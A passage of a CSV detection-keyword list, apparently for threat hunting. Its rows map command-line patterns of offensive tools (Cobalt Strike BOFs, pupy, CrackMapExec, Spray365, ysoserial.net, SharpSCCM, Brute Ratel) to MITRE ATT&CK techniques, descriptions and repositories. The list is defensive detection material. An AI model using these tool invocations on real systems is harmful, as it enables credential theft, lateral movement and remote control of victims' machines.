-p *--target*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many 
methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"* FUZZ:FUZZ *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* --fuzzers addition*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers bitsquatting*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers cyrillic*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. 
Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers dictionary*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers homoglyph*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers hyphenation*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. 
Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers insertion*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers omission*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers repetition*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. 
Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers replacement*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers subdomain*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers transposition*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. 
Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* --fuzzers vowel-swap*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"* -g ActivitySurrogateSelector*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -g ClaimsPrincipal *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -g -n --kerberoast*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -g PSObject 
*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -g TextFormattingRunProperties *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* --gadget ActivitySurrogateSelector*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* --gadget ClaimsPrincipal *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* --gadget PSObject *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* ganglia-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* GC2-sheet*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","0","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z" +"* gcat.py -*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" +"* gen -f client -O windows -A x64*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* gen -S -f client -O windows -A x64*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* generate audit -ep *--passwords_in_userfile*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"* generate normal -ep * -d * -u * -pf *","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"* generate normal -ep ex-plan.s365 *","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"* generate_my_dll*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","0","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"* generatePayload*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"* --gen-relay-list *","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --gen-relay-list /tmp/relaylistOutputFilename.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* get class-instances SMS_R_System *","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* get class-properties SMS_Admin*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* get collection-members -n USERS*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* get primary-users -u *","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* get site-push-settings*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* get_keystrokes*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* get_netdomaincontroller*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* get_netrdpsession*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* get_rooot *","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","0","N/A","N/A","3","203","41","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" +"* get_timedscreenshot*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* GetAppLockerPolicies*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","0","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" +"* GetLsassPid*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 
- T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" +"* getprivs.c *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"* getprivs.o *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - 
T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"* Get-SpoolStatus.ps1*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" +"* --get-syscallstub *","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" +"* -GHUser * -GHRepo *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
